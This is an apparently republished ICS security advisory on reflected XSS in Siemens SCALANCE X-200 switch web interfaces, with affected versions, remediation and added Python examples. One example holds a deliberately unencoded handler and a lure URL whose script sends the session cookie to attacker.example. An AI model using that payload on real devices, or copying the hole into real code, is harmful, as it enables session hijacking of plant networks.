OTPulse

Siemens SCALANCE X-200 and X-200IRT Families (Update A)

Severity: Act Now · CVSS 9.6 · ICS-CERT ICSA-22-286-15 · Oct 11, 2022
Attack Vector: Network
Auth Required: None
Complexity: Low
User Interaction: Required
Summary

Cross-site scripting (XSS) in the web management interface of the Siemens SCALANCE X-200 and X-200IRT switch families. An attacker can inject JavaScript that runs in the browser of a logged-in user, read the session cookie and hijack the authenticated session, gaining access to switch configuration and control. Affected are the SCALANCE X200, X201, X202, X204, X206, X208, X212, X216 and X224 models together with their XF-series and SIPLUS NET variants: the non-IRT X204/X206/X208/X212/X216/X224 line in firmware versions prior to V5.2.5, and the IRT models (X200/X201/X202/X204IRT, XF and SIPLUS NET variants) in versions prior to V5.5.0. Siemens has released firmware updates for all affected models.

What this means
What could happen
An attacker could inject malicious scripts into the web interface of affected SCALANCE switches to steal session cookies and hijack administrative sessions, allowing them to gain unauthorized access and control over network switching and IRT (Isochronous Real-Time) communication in the plant.
Who's at risk
Water utilities and electric utilities operating Siemens SCALANCE X-200 and X-200IRT managed switches (X200 through X224, including the XF-200 variants) for industrial network connectivity and IRT synchronization. Exposure is most serious where these switches carry SCADA network segmentation, PLC communication and remote device connectivity.
How it could be exploited
An attacker crafts a URL to the switch's web interface that carries JavaScript in a parameter the interface reflects into the page, and tricks an operator or engineer into opening it while logged in. The script runs in the context of the victim's browser session, reads the session cookie and sends it to the attacker, who then replays the cookie to impersonate the user against the management interface.
Prerequisites
  • Network access to the SCALANCE switch web interface (typically port 80 or 443)
  • A valid user must be logged into the web interface and open the malicious link in the same browser
  • The switch must be running firmware older than V5.2.5 (non-IRT X204/X206/X208/X212/X216/X224 families) or older than V5.5.0 (IRT models: X200/X201/X202/X204IRT, XF and SIPLUS NET variants)
  • Remotely exploitable via the web interface
  • User interaction required (opening the malicious link)
  • Session hijacking could lead to unauthorized device configuration changes
  • Affects network infrastructure devices that bridge operational and management networks
  • Patches are available but require maintenance windows
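The pattern described above, shown as an added, generic illustration of the bug class (this is not Siemens code; the SCALANCE firmware is closed source, and the page name, the `msg` parameter, the cookie name and the attacker host `attacker.example` are assumptions). A vulnerable handler reflects a query parameter into the page unencoded, the fixed handler HTML-encodes it, and the cookie helper shows the flags that limit what a successful injection can do with the session cookie:

```python
# Added illustration of the reflected-XSS pattern: a generic embedded-web-UI
# handler, NOT Siemens code. Parameter names and page layout are assumptions.
import html
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit


def render_status_vulnerable(url: str) -> str:
    """Reflect the 'msg' query parameter into the page without encoding.

    This is the bug class: anything in the URL becomes live markup."""
    params = parse_qs(urlsplit(url).query)
    msg = params.get("msg", [""])[0]
    return f"<html><body><h1>Switch status</h1><p>{msg}</p></body></html>"


def render_status_fixed(url: str) -> str:
    """Same page with the parameter HTML-encoded before it reaches the markup."""
    params = parse_qs(urlsplit(url).query)
    msg = params.get("msg", [""])[0]
    safe = html.escape(msg, quote=True)  # < > & " ' all become entities
    return f"<html><body><h1>Switch status</h1><p>{safe}</p></body></html>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for a session cookie that page script cannot read.

    HttpOnly stops document.cookie exfiltration; Secure keeps it off plain
    HTTP; SameSite=Strict keeps it off cross-site navigations from the lure.
    None of these removes the XSS: script injected into the logged-in page
    can still issue requests from that page with the cookie attached."""
    c = SimpleCookie()
    c["SESSIONID"] = session_id
    c["SESSIONID"]["httponly"] = True
    c["SESSIONID"]["secure"] = True
    c["SESSIONID"]["samesite"] = "Strict"
    c["SESSIONID"]["path"] = "/"
    return c.output(header="").strip()


# Constructed lure URL of the kind the advisory describes: the injected
# script posts the victim's cookie to an attacker-controlled host (assumed).
LURE = ("http://192.0.2.10/status?msg="
        "%3Cscript%3Efetch(%27http://attacker.example/c?%27%2Bdocument.cookie)%3C/script%3E")

if __name__ == "__main__":
    print(render_status_vulnerable(LURE))
    print(render_status_fixed(LURE))
    print(session_cookie_header("abc123"))
```

The fixed handler still reflects the value, but as text rather than markup, which is the actual repair; the cookie flags are defence in depth and are worth checking on any embedded web UI you cannot patch immediately.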
Exploitability
Low exploit probability (EPSS 0.7%)
Affected products (30), 30 with fix; first 5 of 30 rows shown
Product | Affected Versions | Fix Status
SCALANCE X200-4P IRT | < V5.5.0 | V5.5.0
SCALANCE X201-3P IRT | < V5.5.0 | V5.5.0
SCALANCE X201-3P IRT PRO | < V5.5.0 | V5.5.0
SCALANCE X202-2IRT | < V5.5.0 | V5.5.0
SCALANCE X202-2P IRT | < V5.5.0 | V5.5.0
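A check a practitioner wants before the maintenance window: run an asset inventory against the two fixed versions the advisory gives. This is an added example, not an OTPulse or Siemens tool; the inventory lines are constructed, and the model-to-threshold mapping is derived from the advisory's two groups (models with "IRT" in the name, including XF and SIPLUS NET IRT variants, fixed in V5.5.0; the non-IRT X204/X206/X208/X212/X216/X224 line fixed in V5.2.5). Anything outside those groups is reported as unknown so it gets checked against the full product list rather than silently passed.

```python
# Added example: audit a switch inventory against the advisory's fixed
# versions. Not a Siemens or OTPulse tool; inventory below is constructed.
import re
from typing import List, Optional, Tuple

# Fixed versions per the advisory.
FIX_IRT = (5, 5, 0)       # X200/X201/X202/X204IRT, XF and SIPLUS NET IRT models
FIX_NON_IRT = (5, 2, 5)   # non-IRT X204/X206/X208/X212/X216/X224 line
NON_IRT_BASES = {"X204", "X206", "X208", "X212", "X216", "X224"}


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """'V5.2.4' or '5.5.0' -> (5, 2, 4); None if the string is not a version."""
    m = re.fullmatch(r"\s*V?(\d+(?:\.\d+)*)\s*", text)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).split("."))


def fixed_version_for(model: str) -> Optional[Tuple[int, int, int]]:
    """Fixed version for a model name, or None when the page's grouping does
    not cover it (e.g. a non-IRT XF model) and the full list must be consulted."""
    name = model.upper()
    if "IRT" in name:
        return FIX_IRT
    m = re.search(r"\bX(2\d\d)", name)   # X208PRO -> X208, X204-2 -> X204
    if m and "X" + m.group(1) in NON_IRT_BASES:
        return FIX_NON_IRT
    return None


def assess(model: str, version: str) -> str:
    """'vulnerable', 'fixed' or 'unknown' for one switch."""
    fix = fixed_version_for(model)
    ver = parse_version(version)
    if fix is None or ver is None:
        return "unknown"
    return "fixed" if ver >= fix else "vulnerable"


def audit(inventory: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Map each (model, firmware) pair to (model, firmware, assessment)."""
    return [(model, ver, assess(model, ver)) for model, ver in inventory]


# Constructed inventory, as exported from an asset tool: (model, firmware).
INVENTORY = [
    ("SCALANCE X208", "V5.2.4"),
    ("SCALANCE X204-2", "V5.2.5"),
    ("SCALANCE X202-2P IRT", "V5.4.1"),
    ("SCALANCE X204IRT", "V5.5.0"),
    ("SIPLUS NET SCALANCE X202-2P IRT", "V5.2.5"),  # IRT: V5.2.5 is NOT enough
    ("SCALANCE XF204", "V5.2.4"),                    # not in either group on this page
]

if __name__ == "__main__":
    for model, ver, status in audit(INVENTORY):
        print(f"{status:<10} {model:<32} {ver}")
```

The SIPLUS NET row is the trap to watch for: an IRT variant at V5.2.5 reads as "patched" if you apply the non-IRT threshold to everything.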
Remediation & Mitigation
Do now
WORKAROUND: Restrict access to the switches' web interface (TCP 80/443) with network firewall rules so that only authorized engineering workstations and control-center networks can reach it.
WORKAROUND: Disable the web management interface on switches that are not actively managed remotely; manage them over the serial console or local access only.
Schedule — requires maintenance window

The firmware update takes effect only after a device reboot, which interrupts the traffic that switch carries; plan for process interruption.

HOTFIX: Update all affected SCALANCE X-series and XF-series switches to firmware V5.2.5 or later (non-IRT X204/X206/X208/X212/X216/X224 families) or V5.5.0 or later (X200/X201/X202/X204IRT, XF201/XF202/XF204IRT and SIPLUS NET variants).
Long-term hardening
HARDENING: Segment the management network from the plant-floor operational network so that switch management interfaces are reachable only from trusted sources.